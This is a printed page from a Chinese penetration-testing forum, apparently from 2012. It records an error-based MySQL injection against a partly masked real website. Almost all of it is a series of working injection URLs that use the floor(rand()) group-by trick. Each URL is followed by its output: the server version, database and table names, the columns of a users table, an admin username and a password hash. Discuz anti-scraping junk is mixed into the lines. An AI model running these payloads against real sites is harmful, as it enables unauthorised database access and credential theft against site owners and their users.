中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
* |. C  e- ~: B0 \$ d8 f6 m& |- L' @6 o' V
之前想找个测试 没想到这有 可以测试下做个记录而已 + U/ G1 O3 X# b9 m* ], n
2 t/ Q2 q' w( j9 j$ Y7 m0 a* Q3 W
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003( C; j* k# T) I+ ?) Z

5 S- K  i* A8 ?: v1 Q) N/data0/htdocs/leqi_new/app/myapp.php9 q+ g8 b1 P% b

- e  ?6 G7 x  h 或者
1 @4 B3 B3 ]+ Y3 ^% H5 d% P
9 g% L# I  a5 G; X2 X9 R/**********version()**********/ 5.1.49-log, [# X, I: p7 y5 N& _" y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* ]7 T1 m" @% g  A. {! K5 y6 ?. s% ]8 R
/**********user()**********/  ( S: y, ^9 O: A( N- v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ ~1 g2 [# R7 N: y% u: ~

9 x" V! ~. N1 p. K5 H- R/ u% u7 u5 r/**********database()**********/  leqi6 L- e! j0 _9 R, n! y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* X0 A4 L, o% P" P1 s; k4 _3 F7 A
; ]4 z' \* f4 g0 q) @8 R4 i/**********limit依次递归爆库**********// n+ c0 X; Q* b% @: G* n- h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 r0 ?- u5 R7 _& cinformation_schema
  l' S+ w, o6 J' S5 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 Y' S9 \1 ]6 y0 `/ {( i! }
leqi
+ U( ]. F7 v% T9 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 j1 h1 }' l" ~% I9 w- v0 d, n
test
( [1 `% {5 O2 n! o+ r1 V1 Z1 _) F9 _) V( Z
/**********limit依次递归爆表名**********/
# p( J# @4 y+ ?2 J/ N/ V& q- uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 ~) X* g6 D% J* L6 C0 e2 m' G4 [
users3 E5 O  O  r) J8 w/ u+ {
7 L: A2 h: a8 X  `) b
/**********limit依次递归爆字段名**********/) `. z1 y4 W. {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 l2 h" y+ P7 b' k5 O6 R* B6 U2 B/ g  Yuser_id,username,nickname,passwd,group_id* W6 F5 B+ q7 }* R4 ?# H" ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23* K9 B, @3 E7 {
/wapc/5000_0005_003
* O9 w, W/ L/ o" j& j* `+ Y+ G11 21+ z9 j, Y8 E: r: y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 E" x, C0 h; I# e8 V5 ~+ h/wapc/5000_0005_003
' [$ {" V" w- g% e, ^! z11 341 351 3614 C5 q; J, R7 x: C+ _
/**********爆数据**********/
2 j3 ]  V$ w& Y1 Z; e: Q1 P. shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% ~$ f& p: p# x) \admin" N1 J4 l* W4 w, Y! U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23  l6 H( b% _; p4 o0 D: e  j
6a8b4574ca231eb8bd52764d4978ffcd$ {( l" _! G" m7 _! U

0 Q3 w7 N1 A( W. x' l& g
* `( f: s; z# ^0 Q



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2